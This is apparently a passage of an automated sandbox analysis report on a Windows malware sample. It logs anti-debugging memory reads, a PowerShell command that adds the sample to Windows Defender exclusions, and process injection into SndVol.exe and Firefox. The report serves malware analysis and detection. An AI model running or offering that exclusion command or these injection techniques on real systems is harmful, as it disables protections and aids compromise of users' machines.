                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F260B mov eax, dword ptr fs:[00000030h]5_2_011F260B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F260B mov eax, dword ptr fs:[00000030h]5_2_011F260B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F260B mov eax, dword ptr fs:[00000030h]5_2_011F260B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F260B mov eax, dword ptr fs:[00000030h]5_2_011F260B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F260B mov eax, dword ptr fs:[00000030h]5_2_011F260B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F260B mov eax, dword ptr fs:[00000030h]5_2_011F260B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125E609 mov eax, dword ptr fs:[00000030h]5_2_0125E609
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011FE627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01222619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121A660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012A866E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01212674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011FC640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E4690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012166B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0125E6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012606F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121A6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011D8918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0127892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0125E908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126C912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01206962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0122096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0122096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0122096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01284978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126C97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01260946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012689B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012689B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E09AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011F29A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126E9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011EA9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012129F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012769C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012149D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012AA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0128483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01202835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01202835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01202835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126C810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E4859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126E872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01276870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011F2840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01210854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E0887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126C89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012AA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0120E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0120EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012A8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0125EB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DCB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01276B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012AAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01288B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011F0BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E0BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126CBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0120EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01200BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E8BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0128EBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0120EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01204A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126CA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011F0A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E6A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0125CA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01236AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011EEA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012B4A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01218A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E8AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E0AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01236ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01214AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01268D20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011D6D10 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011FAD00 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01298D10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01214D1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E0D59 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E8D59 mov eax, dword ptr fs:[00000030h] (5 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01278D6B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01216DA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012A8DAE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012B4DAD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121CDB1 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121CDB1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01208DBF mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01200DE1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0120CDF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0120CDF0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01280DF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ungziped_file.exe; Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\ungziped_file.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtDeviceIoControlFile: Direct from: 0x77012AEC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtAllocateVirtualMemory: Direct from: 0x77012BEC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtAllocateVirtualMemory: Direct from: 0x770148EC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtSetInformationThread: Direct from: 0x77012B4C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtQueryAttributesFile: Direct from: 0x77012E6C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtQueryVolumeInformationFile: Direct from: 0x77012F2C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtOpenSection: Direct from: 0x77012E0C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtQuerySystemInformation: Direct from: 0x770148CC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtOpenKeyEx: Direct from: 0x77012B9C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtProtectVirtualMemory: Direct from: 0x77012F9C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtCreateFile: Direct from: 0x77012FEC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtOpenFile: Direct from: 0x77012DCC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtQueryInformationToken: Direct from: 0x77012CAC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtTerminateThread: Direct from: 0x77012FCC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtProtectVirtualMemory: Direct from: 0x77007B2E
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtAllocateVirtualMemory: Direct from: 0x77012BFC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtReadFile: Direct from: 0x77012ADC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtNotifyChangeKey: Direct from: 0x77013C2C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtCreateMutant: Direct from: 0x770135CC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtSetInformationProcess: Direct from: 0x77012C5C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtResumeThread: Direct from: 0x770136AC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtSetInformationThread: Direct from: 0x770063F9
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtWriteVirtualMemory: Direct from: 0x77012E3C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtMapViewOfSection: Direct from: 0x77012D1C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtAllocateVirtualMemory: Direct from: 0x77013C9C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtWriteVirtualMemory: Direct from: 0x7701490C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtClose: Direct from: 0x77012B6C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtReadVirtualMemory: Direct from: 0x77012E8C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtCreateKey: Direct from: 0x77012C6C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtDelayExecution: Direct from: 0x77012DDC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtQuerySystemInformation: Direct from: 0x77012DFC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtQueryInformationProcess: Direct from: 0x77012C26
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtResumeThread: Direct from: 0x77012FBC
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe; NtCreateUserProcess: Direct from: 0x7701371C
                Source: C:\Users\user\Desktop\ungziped_file.exe; Section loaded: NULL target: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\ungziped_file.exe; Section loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe protection: read write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SndVol.exe; Thread register set: target process: 7148
                Source: C:\Windows\SysWOW64\SndVol.exe; Thread APC queued: target process: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe
                Source: C:\Users\user\Desktop\ungziped_file.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Users\user\Desktop\ungziped_file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
